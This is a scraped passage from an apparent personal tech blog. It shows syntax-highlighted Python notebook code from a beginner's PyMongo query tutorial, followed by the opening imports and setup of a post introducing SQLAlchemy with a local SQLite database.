<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'NA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">10</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'NA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">20</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'SA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">30</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'TQ'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">40</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'DP'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">50</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'TA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">60</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'PK'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">70</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-1'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">80</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-2'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-3'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1000</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">]</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Insert the above records</span>
<span style="color: white;">employees.insert_many(insert_many)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query operators</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Count the number of documents in the users and employees table</span>
<span style="color: white;">securitynik_db.user.count_documents({}),</span> <span style="color: white;">securitynik_db.employees.count_documents(filter={})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Find one record</span>
<span style="color: white;">securitynik_db.employees.find_one(filter={})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Count all records where the sex is male</span>
<span style="color: white;">securitynik_db.employees.count_documents({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Count all records where the sex is Female</span>
<span style="color: white;">securitynik_db.employees.count_documents({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Combining the filter to look for a more targeted record</span>
<span style="color: white;">securitynik_db.employees.count_documents({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-2'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Find the record that matches the above criterion</span>
<span style="color: white;">securitynik_db.employees.find_one({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-2'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the age is equal to 20</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$eq'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the age is less than 20</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$lt'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the age is greater than 20</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$gt'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">80</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records within an array</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$in'</span><span style="color: white;">:[</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086f7; font-weight: bold;">1000</span><span style="color: white;">]</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records not within an array</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$nin'</span><span style="color: white;">:[</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086f7; font-weight: bold;">1000</span><span style="color: white;">]</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the blogsOn field exists</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'blogsOn'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$exists'</span><span style="color: white;">:</span> <span style="color: #0086d2;">'true'</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the blogsOn field exists and has 2 or more entries</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># in the blogsOn Field</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'blogsOn.1'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$exists'</span><span style="color: white;">:</span> <span style="color: #0086d2;">'true'</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># finding all the unique values for the blogsOn field</span>
<span style="color: white;">securitynik_db.employees.distinct(</span><span style="color: #0086d2;">'blogsOn'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># finding all the unique values for the sex field</span>
<span style="color: white;">securitynik_db.employees.distinct(</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># finding all the unique values for the user field in the users collection</span>
<span style="color: white;">securitynik_db.user.distinct(</span><span style="color: #0086d2;">'user'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Using distinct with regular expressions</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Looking for all records where the user starts with </span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Nak, Ney, Pam or contains the characters sadi and ends with Alleyne</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># While ignorning case sensitivity</span>
<span style="color: white;">securitynik_db.user.distinct(</span><span style="color: #0086d2;">'user'</span><span style="color: white;">,</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'user'</span> <span style="color: white;">:</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$regex'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'^(Nak\w+|Ney|Pam|[sadi]).*alleyne$'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'$options'</span><span style="color: white;">:</span> <span style="color: #0086d2;">'i'</span><span style="color: white;">}</span> <span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging projections to find the fields of interest</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Then return only the columns of interest</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># 1 means return the field, id is returned by default, </span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># so using 0 to suppress it.</span>
<span style="color: white;">list(securitynik_db.employees.find(filter={},</span> <span style="color: white;">projection={</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">,</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: #0086d2;">'lname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">}))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Expanding on above to sort the results</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'age'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Expanding on above to sort the results</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Limiting the number of returned record</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)],</span> <span style="color: white;">limit=</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Limiting the number of returned record while taking advantage of skip</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)],</span> <span style="color: white;">skip=</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: white;">limit=</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Creating an index and leveraging same</span>
<span style="color: white;">securitynik_db.employees.create_index([(</span><span style="color: #0086d2;">'age'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leverage the index</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Creating an index and leveraging same</span>
<span style="color: white;">list(securitynik_db.employees.find({</span><span style="color: #0086d2;">'age'</span><span style="color: white;">:</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">}))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Create a compound index</span>
<span style="color: white;">securitynik_db.employees.create_index([(</span><span style="color: #0086d2;">'age'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">),</span> <span style="color: white;">(</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Grabbing initial information on the index</span>
<span style="color: white;">securitynik_db.employees.index_information()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Getting an explanation about my query</span>
<span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span> <span style="color: #0086d2;">'6263735f43142a78a4071445'</span><span style="color: white;">}).explain()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Using aggregate feature</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># doing most of the work at the server</span>
<span style="color: white;">list(securitynik_db.employees.aggregate([{</span><span style="color: #0086d2;">'$match'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'fname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Nik'</span><span style="color: white;">}},</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$project'</span> <span style="color: white;">:</span> <span style="color: white;">{</span><span style="color: #0086d2;">'lname'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">,</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">}},</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$limit'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">}]))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Using aggregate feature</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># doing most of the work at the server</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># count the number of returned records</span>
<span style="color: white;">list(securitynik_db.employees.aggregate([{</span><span style="color: #0086d2;">'$match'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'fname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Nik'</span><span style="color: white;">}},</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$project'</span> <span style="color: white;">:</span> <span style="color: white;">{</span><span style="color: #0086d2;">'lname'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">,</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">}},</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$limit'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">},</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$count'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">}]))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="color: #0086d2;">''' </span>
<span style="color: #0086d2;">References:</span>
<span style="color: #0086d2;">https://hevodata.com/learn/python-pymongo-mongoclient/</span>
<span style="color: #0086d2;">https://campus.datacamp.com/courses/introduction-to-using-mongodb-for-data-science-with-python/</span>
<span style="color: #0086d2;">https://www.linkedin.com/pulse/mongodb-101-beginners-part1-amany-mounes/</span>
<span style="color: #0086d2;">https://www.mongodb.com/docs/manual/tutorial/query-documents/#std-label-read-operations-query-argument</span>
<span style="color: #0086d2;">https://www.tutorialspoint.com/python_mongodb/python_mongodb_tutorial.pdf</span>
<span style="color: #0086d2;">https://www.bogotobogo.com/python/MongoDB_PyMongo/python_MongoDB_pyMongo_tutorial_connecting_accessing.php</span>
<span style="color: #0086d2;">https://pymongo.readthedocs.io/en/stable/api/pymongo/mongo_client.html</span>
<span style="color: #0086d2;">https://www.mongodb.com/docs/manual/reference/operator/query/</span>
<span style="color: #0086d2;">https://www.educba.com/mongodb-query-operators/</span>
<span style="color: #0086d2;">https://www.w3schools.in/mongodb/projection-queries</span>
<span style="color: #0086d2;">'''</span>
</pre></td></tr></tbody></table></div>
</div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-56320181147037352712022-04-14T19:12:00.031-07:002022-04-16T06:52:50.789-07:00Beginning SQLalchemySee this GitHub link for the full notebook.
<a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/beginning-sql-alchemy-blog.ipynb" target="_blank">https://github.com/SecurityNik/Data-Science-and-ML/blob/main/beginning-sql-alchemy-blog.ipynb</a>
<!-- HTML generated using hilite.me --><div style="background: #111111; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><table><tr><td><pre style="margin: 0; line-height: 125%"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401</pre></td><td><pre style="margin: 0; line-height: 125%"><span style="color: #008800; font-style: italic; background-color: #0f140f">#!/usr/bin/env python</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># coding: utf-8</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[1]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">In this post, I am learning more about sqlalachemy</span>
<span style="color: #0086d2">'''</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># First up, import the sqlalchemy modules I will need need to use</span>
<span style="color: #fb660a; font-weight: bold">from</span> <span style="color: #ffffff">sqlalchemy</span> <span style="color: #fb660a; font-weight: bold">import</span> <span style="color: #ffffff">create_engine,</span> <span style="color: #ffffff">MetaData,</span> <span style="color: #ffffff">Table,</span> <span style="color: #ffffff">Column,</span> <span style="color: #ffffff">Integer,</span> <span style="color: #ffffff">String,</span> <span style="color: #ffffff">Text,</span> <span style="color: #ffffff">text,</span> <span style="color: #ffffff">select,</span> <span style="color: #ffffff">or_,</span> <span style="color: #ffffff">and_,</span> <span style="color: #ffffff">desc,</span> <span style="color: #ffffff">func,</span> <span style="color: #ffffff">case,</span> <span style="color: #ffffff">cast,</span> <span style="color: #ffffff">Float,</span> <span style="color: #ffffff">DECIMAL,</span> <span style="color: #ffffff">Boolean,</span> <span style="color: #ffffff">insert,</span> <span style="color: #ffffff">update,</span> <span style="color: #ffffff">delete,</span> <span style="color: #ffffff">Date,</span> <span style="color: #ffffff">DateTime,</span> <span style="color: #ffffff">ARRAY,</span> <span style="color: #ffffff">ForeignKey</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Import datetime</span>
<span style="color: #fb660a; font-weight: bold">from</span> <span style="color: #ffffff">datetime</span> <span style="color: #fb660a; font-weight: bold">import</span> <span style="color: #ffffff">datetime</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># import pandas as I will use this to importand view data</span>
<span style="color: #fb660a; font-weight: bold">import</span> <span style="color: #ffffff">pandas</span> <span style="color: #fb660a; font-weight: bold">as</span> <span style="color: #ffffff">pd</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[2]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Delete the database file if it previous existed</span>
<span style="color: #ffffff">get_ipython().system(</span><span style="color: #0086d2">'del /f securitynik-db.sqlite'</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[3]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Create a SQLite database and interface to it via create_engine.</span>
<span style="color: #0086d2">As this database does not exist as yet, it will be created on the disk</span>
<span style="color: #0086d2">using the relative path. Hence the ///</span>
<span style="color: #0086d2">This engine does not actually connect to the database at this time.</span>
<span style="color: #0086d2">A connection will be made once a request has been made to perform a task</span>
<span style="color: #0086d2">'''</span>
